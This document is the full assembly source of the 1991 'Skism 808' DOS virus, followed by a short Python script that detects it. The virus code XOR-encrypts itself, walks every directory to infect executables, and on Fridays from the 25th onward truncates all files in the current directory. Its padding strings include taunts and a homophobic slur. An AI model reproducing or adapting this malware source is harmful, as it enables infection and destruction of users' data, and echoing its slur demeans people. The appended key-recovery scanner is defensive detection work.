;tHE sKISM 808 vIRUS. cREATED 1991 BY sMART kIDS iNTO sICK mETHODS.

FILENAME   equ 30       ;USED TO FIND FILE NAME
FILEATTR   equ 21       ;USED TO FIND FILE ATTRIBUTES
FILEDATE   equ 24       ;USED TO FIND FILE DATE
FILETIME   equ 22       ;USED TO FIND FILE TIME
CODE_START equ 0100H    ;START OF ALL .com FILES
VIRUS_SIZE equ 808      ;tr 808

CODE SEGMENT 'CODE'
        ASSUME CS:CODE,DS:CODE,ES:CODE
        ORG CODE_START

MAIN PROC NEAR
        JMP VIRUS_START
ENCRYPT_VAL DB 00H

VIRUS_START:
        CALL ENCRYPT                    ;ENCRYPT/DECRYPT FILE
        JMP VIRUS                       ;GO TO START OF CODE

ENCRYPT:
        PUSH CX
        MOV BX,OFFSET VIRUS_CODE        ;START ENCRYPTION AT DATA
XOR_LOOP:
        MOV CH,[BX]                     ;READ CURRENT BYTE
        XOR CH,ENCRYPT_VAL              ;GET ENCRYPTION KEY
        MOV [BX],CH                     ;SWITCH BYTES
        INC BX                          ;MOVE BX UP A BYTE
        CMP BX,OFFSET VIRUS_CODE+VIRUS_SIZE ;ARE WE DONE WITH THE ENCRYPTION
        JLE XOR_LOOP                    ;NO? KEEP GOING
        POP CX
        RET

INFECTFILE:
        MOV DX,CODE_START               ;WHERE VIRUS STARTS IN MEMORY
        MOV BX,HANDLE                   ;LOAD BX WITH HANDLE
        PUSH BX                         ;SAVE HANDLE ON STACK
        CALL ENCRYPT                    ;ENCRYPT FILE
        POP BX                          ;GET BACK BX
        MOV CX,VIRUS_SIZE               ;NUMBER OF BYTES TO WRITE
        MOV AH,40H                      ;WRITE TO FILE
        INT 21H                         ;
        PUSH BX
        CALL ENCRYPT                    ;FIX UP THE MESS
        POP BX
        RET

VIRUS_CODE:
WILDCARDS  DB "*",0             ;SEARCH FOR DIRECTORY ARGUMENT
FILESPEC   DB "*.exe",0         ;SEARCH FOR exe FILE ARGUMENT
FILESPEC2  DB "*.*",0
ROOTDIR    DB "\",0             ;ARGUMENT FOR ROOT DIRECTORY
DIRDATA    DB 43 DUP (?)        ;HOLDS DIRECTORY dta
FILEDATA   DB 43 DUP (?)        ;HOLDS FILES dta
DISKDTASEG DW ?                 ;HOLDS DISK DTA SEGMENT
DISKDTAOFS DW ?                 ;HOLDS DISK DTA OFFSET
TEMPOFS    DW ?                 ;HOLDS OFFSET
TEMPSEG    DW ?                 ;HOLDS SEGMENT
DRIVECODE  DB ?                 ;HOLDS DRIVE CODE
CURRENTDIR DB 64 DUP (?)        ;SAVE CURRENT DIRECTORY INTO THIS
HANDLE     DW ?                 ;HOLDS FILE HANDLE
ORIG_TIME  DW ?                 ;HOLDS FILE TIME
ORIG_DATE  DW ?                 ;HOLDS FILE DATE
ORIG_ATTR  DW ?                 ;HOLDS FILE ATTR
IDBUFFER   DW 2 DUP (?)         ;HOLDS VIRUS ID

VIRUS:
        MOV AX,3000H                    ;GET DOS VERSION
        INT 21H                         ;
        CMP AL,02H                      ;IS IT AT LEAST 2.00?
        JB BUS1                         ;WON'T INFECT LESS THAN 2.00
        MOV AH,2CH                      ;GET TIME
        INT 21H                         ;
        MOV ENCRYPT_VAL,DL              ;SAVE M_SECONDS TO ENCRYPT VAL SO
                                        ;THERES 100 MUTATIONS POSSIBLE
SETDTA:
        MOV DX,OFFSET DIRDATA           ;OFFSET OF WHERE TO HOLD NEW DTA
        MOV AH,1AH                      ;SET DTA ADDRESS
        INT 21H                         ;
NEWDIR:
        MOV AH,19H                      ;GET DRIVE CODE
        INT 21H                         ;
        MOV DL,AL                       ;SAVE DRIVECODE
        INC DL                          ;ADD ONE TO DL, BECAUSE FUNCTIONS DIFFER
        MOV AH,47H                      ;GET CURRENT DIRECTORY
        MOV SI,OFFSET CURRENTDIR        ;BUFFER TO SAVE DIRECTORY IN
        INT 21H                         ;
        MOV DX,OFFSET ROOTDIR           ;MOVE DX TO CHANGE TO ROOT DIRECTORY
        MOV AH,3BH                      ;CHANGE DIRECTORY TO ROOT
        INT 21H                         ;
SCANDIRS:
        MOV CX,13H                      ;INCLUDE HIDDEN/RO DIRECTORYS
        MOV DX,OFFSET WILDCARDS         ;LOOK FOR '*'
        MOV AH,4EH                      ;FIND FIRST FILE
        INT 21H                         ;
        CMP AX,12H                      ;NO FIRST FILE?
        JNE DIRLOOP                     ;NO DIRS FOUND? BAIL OUT
BUS1:   JMP BUS
DIRLOOP:
        MOV AH,4FH                      ;FIND NEXT FILE
        INT 21H                         ;
        CMP AX,12H
        JE BUS                          ;NO MORE DIRS FOUND, ROLL OUT
CHDIR:
        MOV DX,OFFSET DIRDATA+FILENAME  ;POINT DX TO FCB - FILENAME
        MOV AH,3BH                      ;CHANGE DIRECTORY
        INT 21H                         ;
        MOV AH,2FH                      ;GET CURRENT DTA ADDRESS
        INT 21H                         ;
        MOV [DISKDTASEG],ES             ;SAVE OLD SEGMENT
        MOV [DISKDTAOFS],BX             ;SAVE OLD OFFSET
        MOV DX,OFFSET FILEDATA          ;OFFSET OF WHERE TO HOLD NEW DTA
        MOV AH,1AH                      ;SET DTA ADDRESS
        INT 21H                         ;
SCANDIR:
        MOV CX,07H                      ;FIND ANY ATTRIBUTE
        MOV DX,OFFSET FILESPEC          ;POINT DX TO "*.com",0
        MOV AH,4EH                      ;FIND FIRST FILE FUNCTION
        INT 21H                         ;
        CMP AX,12H                      ;WAS FILE FOUND?
        JNE TRANSFORM
NEXTEXE:
        MOV AH,4FH                      ;FIND NEXT FILE
        INT 21H                         ;
        CMP AX,12H                      ;NONE FOUND
        JNE TRANSFORM                   ;FOUND SEE WHAT WE CAN DO
        MOV DX,OFFSET ROOTDIR           ;MOVE DX TO CHANGE TO ROOT DIRECTORY
        MOV AH,3BH                      ;CHANGE DIRECTORY TO ROOT
        INT 21H                         ;
        MOV AH,1AH                      ;SET DTA ADDRESS
        MOV DS,[DISKDTASEG]             ;RESTORE OLD SEGMENT
        MOV DX,[DISKDTAOFS]             ;RESTORE OLD OFFSET
        INT 21H                         ;
        JMP DIRLOOP
BUS:    JMP ROLLOUT
TRANSFORM:
        MOV AH,2FH                      ;TEMPORALLY STORE DTA
        INT 21H                         ;
        MOV [TEMPSEG],ES                ;SAVE OLD SEGMENT
        MOV [TEMPOFS],BX                ;SAVE OLD OFFSET
        MOV DX,OFFSET FILEDATA+FILENAME
        MOV BX,OFFSET FILEDATA          ;SAVE FILE...
        MOV AX,[BX]+FILEDATE            ;DATE
        MOV ORIG_DATE,AX                ;
        MOV AX,[BX]+FILETIME            ;TIME
        MOV ORIG_TIME,AX                ; AND
        MOV AX,[BX]+FILEATTR            ;
        MOV AX,4300H
        INT 21H
        MOV ORIG_ATTR,CX
        MOV AX,4301H                    ;CHANGE ATTRIBUTES
        XOR CX,CX                       ;CLEAR ATTRIBUTES
        INT 21H                         ;
        MOV AX,3D00H                    ;OPEN FILE - READ
        INT 21H                         ;
        JC FIXUP                        ;ERROR - FIND ANOTHER FILE
        MOV HANDLE,AX                   ;SAVE HANDLE
        MOV AH,3FH                      ;READ FROM FILE
        MOV BX,HANDLE                   ;MOVE HANDLE TO BX
        MOV CX,02H                      ;READ 2 BYTES
        MOV DX,OFFSET IDBUFFER          ;SAVE TO BUFFER
        INT 21H                         ;
        MOV AH,3EH                      ;CLOSE FILE FOR NOW
        MOV BX,HANDLE                   ;LOAD BX WITH HANDLE
        INT 21H                         ;
        MOV BX,IDBUFFER                 ;FILL BX WITH ID STRING
        CMP BX,02EBH                    ;INFECTED?
        JNE DOIT                        ;SAME - FIND ANOTHER FILE
FIXUP:
        MOV AH,1AH                      ;SET DTA ADDRESS
        MOV DS,[TEMPSEG]                ;RESTORE OLD SEGMENT
        MOV DX,[TEMPOFS]                ;RESTORE OLD OFFSET
        INT 21H                         ;
        JMP NEXTEXE
DOIT:
        MOV DX,OFFSET FILEDATA+FILENAME
        MOV AX,3D02H                    ;OPEN FILE READ/WRITE ACCESS
        INT 21H                         ;
        MOV HANDLE,AX                   ;SAVE HANDLE
        CALL INFECTFILE
        ;MOV AX,3EH                     ;CLOSE FILE
        ;INT 21H
ROLLOUT:
        MOV AX,5701H                    ;RESTORE ORIGINAL
        MOV BX,HANDLE                   ;
        MOV CX,ORIG_TIME                ;TIME AND
        MOV DX,ORIG_DATE                ;DATE
        INT 21H                         ;
        MOV AX,4301H                    ;RESTORE ORIGINAL ATTRIBUTES
        MOV CX,ORIG_ATTR
        MOV DX,OFFSET FILEDATA+FILENAME
        INT 21H
        ;MOV BX,HANDLE
        ;MOV AX,3EH                     ;CLOSE FILE
        ;INT 21H
        MOV AH,3BH                      ;TRY TO FIX THIS
        MOV DX,OFFSET ROOTDIR           ;FOR SPEED
        INT 21H                         ;
        MOV AH,3BH                      ;CHANGE DIRECTORY
        MOV DX,OFFSET CURRENTDIR        ;BACK TO ORIGINAL
        INT 21H                         ;
        MOV AH,2AH                      ;CHECK SYSTEM DATE
        INT 21H                         ;
        CMP CX,1991                     ;IS IT AT LEAST 1991?
        JB AUDI                         ;NO? DON'T DO IT NOW
        CMP DL,25                       ;IS IT THE 25TH?
        JB AUDI                         ;NOT YET? QUIT
        CMP AL,5                        ;IS fRIDAY?
        JNE AUDI                        ;NO? QUIT
        MOV DX,OFFSET DIRDATA           ;OFFSET OF WHERE TO HOLD NEW DTA
        MOV AH,1AH                      ;SET DTA ADDRESS
        INT 21H                         ;
        MOV AH,4EH                      ;FIND FIRST FILE
        MOV CX,7H                       ;
        MOV DX,OFFSET FILESPEC2         ;OFFSET *.*
LOOPS:
        INT 21H                         ;
        JC AUDI                         ;ERROR? THEN QUIT
        MOV AX,4301H                    ;FIND ALL NORMAL FILES
        XOR CX,CX                       ;
        INT 21H                         ;
        MOV DX,OFFSET DIRDATA+FILENAME
        MOV AH,3CH                      ;FUCK UP ALL FILES IN CURRENT DIR
        INT 21H                         ;
        JC AUDI                         ;ERROR? QUIT
        MOV AH,4FH                      ;FIND NEXT FILE
        JMP LOOPS                       ;
AUDI:
        MOV AX,4C00H                    ;END PROGRAM
        INT 21H                         ;

;tHE BELOW IS JUST TEXT TO PAD OUT THE VIRUS SIZE TO 808 BYTES. dON'T
;JUST CHANGE THE TEXT AND CLAIM THAT THIS IS YOUR CREATION.
WORDS_ DB "sKISM rYTHEM sTACK vIRUS-808. sMART kIDS iNTO sICK mETHODS",0
WORDS2 DB " dONT ALTER THIS CODE INTO YOUR OWN STRAIN, FAGGIT. ",0
WORDS3 DB " hr/sss nycITY, THIS IS THE FIFTH OF MANY, MANY MORE....",0
WORDS4 DB " yOU SISSYS.....",0

MAIN ENDP
CODE ENDS
        END MAIN
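A scanner-side check derived from the listing, added here as an example and not part of the original code: the encryption is a single-byte XOR of everything from VIRUS_CODE onward with ENCRYPT_VAL, the byte stored right after the entry JMP, and the encrypted region includes the WORDS_ padding string, so recovering that key byte and XORing the image exposes the marker. Both a short (EB) and a near (E9) encoding of the entry jump are assumed possible, so key offsets 2 and 3 are tried; the sample image is constructed and carries none of the listing's logic.

```python
from typing import Optional

# Plaintext padding string carried at the tail of the listing (WORDS_).
MARKER = b"sKISM rYTHEM sTACK vIRUS-808"
# Assumption: the entry JMP is either short (EB rel8) or near (E9 rel16),
# putting ENCRYPT_VAL at file offset 2 or 3 respectively.
KEY_OFFSETS = (2, 3)
ENTRY_OPCODES = (0xEB, 0xE9)
IMAGE_SIZE = 808  # VIRUS_SIZE from the listing


def xor_bytes(data: bytes, key: int) -> bytes:
    """Same transform as the ENCRYPT routine: XOR every byte with one key byte."""
    return bytes(b ^ key for b in data)


def scan_image(image: bytes) -> Optional[dict]:
    """Return {"key_offset", "key"} when a candidate key decrypts the marker, else None.

    XORing the whole image garbles the unencrypted stub, but the encrypted
    body (VIRUS_CODE onward) comes back to plaintext, which is where the
    marker lives.  A key of 0x00 is handled naturally (XOR is a no-op).
    """
    if len(image) < 4 or image[0] not in ENTRY_OPCODES:
        return None
    for off in KEY_OFFSETS:
        key = image[off]
        if MARKER in xor_bytes(image, key):
            return {"key_offset": off, "key": key}
    return None


def build_sample(key: int, near: bool = False) -> bytes:
    """Constructed test image (not the virus): entry jump, key byte, then a
    benign filler body XORed with that key, padded to IMAGE_SIZE bytes."""
    header = bytes([0xE9, 0x01, 0x00, key]) if near else bytes([0xEB, 0x01, key])
    body = (b"\x90" * 40 + MARKER + b"\x00").ljust(IMAGE_SIZE - len(header), b"\x00")
    return header + xor_bytes(body, key)


if __name__ == "__main__":
    print(scan_image(build_sample(0x37)))              # key recovered at offset 2
    print(scan_image(b"\xEB\x01\x00" + b"\x90" * 805))  # clean stub: None
```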